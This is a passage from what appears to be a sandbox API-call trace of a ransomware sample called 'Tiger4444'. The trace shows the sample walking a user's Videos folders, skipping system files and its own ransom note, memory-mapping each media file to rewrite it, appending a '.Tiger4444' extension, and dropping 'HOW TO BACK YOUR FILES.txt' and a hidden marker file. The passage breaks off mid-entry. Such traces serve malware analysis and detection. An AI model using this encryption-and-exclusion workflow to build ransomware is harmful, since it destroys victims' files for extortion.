CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3080, lpName=0x0) returned 0x2c8 [0045.207] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3080) returned 0xbe0000 [0045.208] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.208] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0045.208] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.208] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0045.208] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.208] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0045.208] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.208] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0045.208] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13666127228) returned 1 [0045.208] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0045.208] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d90 | out: hHeap=0xc50000) returned 1 [0045.208] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.208] CloseHandle (hObject=0x2c8) returned 1 [0045.208] CloseHandle (hObject=0x260) returned 1 [0045.210] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\JKXNIWeQxs8Bq.swf.Tiger4444") returned 65 [0045.210] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\JKXNIWeQxs8Bq.swf" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\jkxniweqxs8bq.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\JKXNIWeQxs8Bq.swf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\jkxniweqxs8bq.swf.tiger4444"), dwFlags=0x1) returned 1 [0045.211] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=11648 | out: Addend=0xc6f980) returned 15859152 [0045.211] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4427 [0045.211] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c86e6d0, ftCreationTime.dwHighDateTime=0x1d4cd15, ftLastAccessTime.dwLowDateTime=0x8d315cd0, ftLastAccessTime.dwHighDateTime=0x1d4d20c, ftLastWriteTime.dwLowDateTime=0x8d315cd0, ftLastWriteTime.dwHighDateTime=0x1d4d20c, nFileSizeHigh=0x0, nFileSizeLow=0x12b38, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NfDZ9FmKUznX7QjqQB0.flv", cAlternateFileName="NFDZ9F~1.FLV")) returned 1 [0045.211] lstrcmpiW (lpString1="NfDZ9FmKUznX7QjqQB0.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.211] lstrcmpiW (lpString1="NfDZ9FmKUznX7QjqQB0.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.211] lstrcmpiW (lpString1="NfDZ9FmKUznX7QjqQB0.flv", lpString2="Tiger4444.exe") returned -1 [0045.211] lstrcmpiW (lpString1="NfDZ9FmKUznX7QjqQB0.flv", lpString2=".") returned 1 [0045.211] lstrcmpiW (lpString1="NfDZ9FmKUznX7QjqQB0.flv", lpString2="..") returned 1 [0045.211] lstrcmpiW (lpString1="NfDZ9FmKUznX7QjqQB0.flv", lpString2="windows") returned -1 [0045.211] lstrcmpiW (lpString1="NfDZ9FmKUznX7QjqQB0.flv", lpString2="bootmgr") returned 1 [0045.211] lstrcmpiW (lpString1="NfDZ9FmKUznX7QjqQB0.flv", lpString2="pagefile.sys") returned -1 [0045.211] lstrcmpiW (lpString1="NfDZ9FmKUznX7QjqQB0.flv", lpString2="boot") returned 1 [0045.211] lstrcmpiW (lpString1="NfDZ9FmKUznX7QjqQB0.flv", lpString2="ids.txt") returned 1 [0045.211] lstrcmpiW (lpString1="NfDZ9FmKUznX7QjqQB0.flv", lpString2="NTUSER.DAT") returned -1 [0045.211] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="NfDZ9FmKUznX7QjqQB0.flv" | out: lpString1="NfDZ9FmKUznX7QjqQB0.flv") returned="NfDZ9FmKUznX7QjqQB0.flv" [0045.211] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\NfDZ9FmKUznX7QjqQB0.flv", dwFileAttributes=0x0) returned 1 [0045.211] lstrlenW (lpString="NfDZ9FmKUznX7QjqQB0.flv") returned 23 [0045.211] lstrlenW (lpString="Tiger4444") returned 9 [0045.211] lstrcmpiW (lpString1="jqQB0.flv", lpString2="Tiger4444") returned -1 [0045.211] lstrlenW (lpString=".dll") returned 4 [0045.211] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0045.211] lstrlenW (lpString=".lnk") returned 4 [0045.211] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0045.211] lstrlenW (lpString=".ini") returned 4 [0045.211] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0045.211] lstrlenW (lpString=".sys") returned 4 [0045.211] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0045.211] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\NfDZ9FmKUznX7QjqQB0.flv" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\nfdz9fmkuznx7qjqqb0.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.212] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.212] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13666471803) returned 1 [0045.212] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=76600) returned 1 [0045.212] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0045.212] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0045.212] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12e40, lpName=0x0) returned 0x2c8 [0045.212] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12e40) returned 0xbe0000 [0045.213] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.213] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0045.213] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.213] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.213] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0045.214] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13666739357) returned 1 [0045.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0045.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0045.214] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.215] CloseHandle (hObject=0x2c8) returned 1 [0045.215] CloseHandle (hObject=0x260) returned 1 [0045.218] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\NfDZ9FmKUznX7QjqQB0.flv.Tiger4444") returned 71 [0045.218] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\NfDZ9FmKUznX7QjqQB0.flv" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\nfdz9fmkuznx7qjqqb0.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\NfDZ9FmKUznX7QjqQB0.flv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\nfdz9fmkuznx7qjqqb0.flv.tiger4444"), dwFlags=0x1) returned 1 [0045.218] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=76608 | out: Addend=0xc6f980) returned 15870800 [0045.218] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4428 [0045.218] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5734da80, ftCreationTime.dwHighDateTime=0x1d4cdc5, ftLastAccessTime.dwLowDateTime=0x272649f0, ftLastAccessTime.dwHighDateTime=0x1d4d342, ftLastWriteTime.dwLowDateTime=0x272649f0, ftLastWriteTime.dwHighDateTime=0x1d4d342, nFileSizeHigh=0x0, nFileSizeLow=0xa31, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OKe9Vwu AXHg.avi", cAlternateFileName="OKE9VW~1.AVI")) returned 1 [0045.218] lstrcmpiW (lpString1="OKe9Vwu AXHg.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.218] lstrcmpiW (lpString1="OKe9Vwu AXHg.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.218] lstrcmpiW (lpString1="OKe9Vwu AXHg.avi", lpString2="Tiger4444.exe") returned -1 [0045.218] lstrcmpiW (lpString1="OKe9Vwu AXHg.avi", lpString2=".") returned 1 [0045.218] lstrcmpiW (lpString1="OKe9Vwu AXHg.avi", lpString2="..") returned 1 [0045.218] lstrcmpiW (lpString1="OKe9Vwu AXHg.avi", lpString2="windows") returned -1 [0045.218] lstrcmpiW (lpString1="OKe9Vwu AXHg.avi", lpString2="bootmgr") returned 1 [0045.218] lstrcmpiW (lpString1="OKe9Vwu AXHg.avi", lpString2="pagefile.sys") returned -1 [0045.219] lstrcmpiW (lpString1="OKe9Vwu AXHg.avi", lpString2="boot") returned 1 [0045.219] lstrcmpiW (lpString1="OKe9Vwu AXHg.avi", lpString2="ids.txt") returned 1 [0045.219] lstrcmpiW (lpString1="OKe9Vwu AXHg.avi", lpString2="NTUSER.DAT") returned 1 [0045.219] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="OKe9Vwu AXHg.avi" | out: lpString1="OKe9Vwu AXHg.avi") returned="OKe9Vwu AXHg.avi" [0045.219] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\OKe9Vwu AXHg.avi", dwFileAttributes=0x0) returned 1 [0045.219] lstrlenW (lpString="OKe9Vwu AXHg.avi") returned 16 [0045.219] lstrlenW (lpString="Tiger4444") returned 9 [0045.219] lstrcmpiW (lpString1=" AXHg.avi", lpString2="Tiger4444") returned -1 [0045.219] lstrlenW (lpString=".dll") returned 4 [0045.219] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0045.219] lstrlenW (lpString=".lnk") returned 4 [0045.219] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0045.219] lstrlenW (lpString=".ini") returned 4 [0045.219] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0045.219] lstrlenW (lpString=".sys") returned 4 [0045.219] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0045.219] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\OKe9Vwu AXHg.avi" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\oke9vwu axhg.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.219] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.219] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13667261718) returned 1 [0045.220] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=2609) returned 1 [0045.220] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0045.220] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0045.220] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd40, lpName=0x0) returned 0x2c8 [0045.220] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd40) returned 0xbe0000 [0045.220] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.220] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0045.220] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.220] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.220] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.221] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.221] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.221] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0045.221] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13667407281) returned 1 [0045.221] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0045.221] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0045.221] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.221] CloseHandle (hObject=0x2c8) returned 1 [0045.221] CloseHandle (hObject=0x260) returned 1 [0045.223] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\OKe9Vwu AXHg.avi.Tiger4444") returned 64 [0045.223] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\OKe9Vwu AXHg.avi" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\oke9vwu axhg.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\OKe9Vwu AXHg.avi.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\oke9vwu axhg.avi.tiger4444"), dwFlags=0x1) returned 1 [0045.223] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=2624 | out: Addend=0xc6f980) returned 15947408 [0045.223] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4430 [0045.223] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d9bb50, ftCreationTime.dwHighDateTime=0x1d4c777, ftLastAccessTime.dwLowDateTime=0xd67453d0, ftLastAccessTime.dwHighDateTime=0x1d4c9d2, ftLastWriteTime.dwLowDateTime=0xd67453d0, ftLastWriteTime.dwHighDateTime=0x1d4c9d2, nFileSizeHigh=0x0, nFileSizeLow=0xe28b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ox_K.flv", cAlternateFileName="")) returned 1 [0045.223] lstrcmpiW (lpString1="Ox_K.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.224] lstrcmpiW (lpString1="Ox_K.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.224] lstrcmpiW (lpString1="Ox_K.flv", lpString2="Tiger4444.exe") returned -1 [0045.224] lstrcmpiW (lpString1="Ox_K.flv", lpString2=".") returned 1 [0045.224] lstrcmpiW (lpString1="Ox_K.flv", lpString2="..") returned 1 [0045.224] lstrcmpiW (lpString1="Ox_K.flv", lpString2="windows") returned -1 [0045.224] lstrcmpiW (lpString1="Ox_K.flv", lpString2="bootmgr") returned 1 [0045.224] lstrcmpiW (lpString1="Ox_K.flv", lpString2="pagefile.sys") returned -1 [0045.224] lstrcmpiW (lpString1="Ox_K.flv", lpString2="boot") returned 1 [0045.224] lstrcmpiW (lpString1="Ox_K.flv", lpString2="ids.txt") returned 1 [0045.224] lstrcmpiW (lpString1="Ox_K.flv", lpString2="NTUSER.DAT") returned 1 [0045.224] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="Ox_K.flv" | out: lpString1="Ox_K.flv") returned="Ox_K.flv" [0045.224] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\Ox_K.flv", dwFileAttributes=0x0) returned 1 [0045.224] lstrlenW (lpString="Ox_K.flv") returned 8 [0045.224] lstrlenW (lpString="Tiger4444") returned 9 [0045.224] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0045.224] lstrlenW (lpString=".dll") returned 4 [0045.224] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0045.224] lstrlenW (lpString=".lnk") returned 4 [0045.224] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0045.224] lstrlenW (lpString=".ini") returned 4 [0045.224] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0045.224] lstrlenW (lpString=".sys") returned 4 [0045.225] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0045.225] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\Ox_K.flv" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\ox_k.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.225] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.225] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13667785509) returned 1 [0045.225] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=57995) returned 1 [0045.225] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0045.225] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0045.225] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe590, lpName=0x0) returned 0x2c8 [0045.225] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe590) returned 0xbe0000 [0045.227] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.227] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0045.227] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.227] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0045.227] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.227] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0045.227] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.227] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0045.227] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13668046596) returned 1 [0045.227] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0045.227] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0045.227] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.228] CloseHandle (hObject=0x2c8) returned 1 [0045.228] CloseHandle (hObject=0x260) returned 1 [0045.234] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\Ox_K.flv.Tiger4444") returned 56 [0045.234] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\Ox_K.flv" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\ox_k.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\Ox_K.flv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\ox_k.flv.tiger4444"), dwFlags=0x1) returned 1 [0045.235] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=58000 | out: Addend=0xc6f980) returned 15950032 [0045.235] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4431 [0045.235] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d9bb50, ftCreationTime.dwHighDateTime=0x1d4c777, ftLastAccessTime.dwLowDateTime=0xd67453d0, ftLastAccessTime.dwHighDateTime=0x1d4c9d2, ftLastWriteTime.dwLowDateTime=0xd67453d0, ftLastWriteTime.dwHighDateTime=0x1d4c9d2, nFileSizeHigh=0x0, nFileSizeLow=0xe28b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ox_K.flv", cAlternateFileName="")) returned 0 [0045.235] FindClose (in: hFindFile=0xc72fc8 | out: hFindFile=0xc72fc8) returned 1 [0045.235] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.235] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.235] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.235] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.236] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.236] CloseHandle (hObject=0x260) returned 1 [0045.237] CloseHandle (hObject=0x2ac) returned 1 [0045.237] GetCurrentThreadId () returned 0xfa8 [0045.237] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66628 [0045.237] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl") returned="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl" [0045.237] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc765e8 | out: hHeap=0xc50000) returned 1 [0045.237] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66620 | out: hHeap=0xc50000) returned 1 [0045.237] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl") returned="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl" [0045.237] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\") returned="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\" [0045.237] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\.BFC0E91B00AE8A0620D3" [0045.237] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\videos\\j4la1r gmdnacszsll\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.239] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.241] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.242] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.243] CloseHandle (hObject=0x2ac) returned 1 [0045.243] lstrlenW (lpString="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl") returned 41 [0045.243] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.243] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ccfb920, ftCreationTime.dwHighDateTime=0x1d4c6b9, ftLastAccessTime.dwLowDateTime=0x148cbd00, ftLastAccessTime.dwHighDateTime=0x1d4d410, ftLastWriteTime.dwLowDateTime=0x7ffba24b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72fc8 [0045.243] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.243] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.243] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.244] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.244] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: 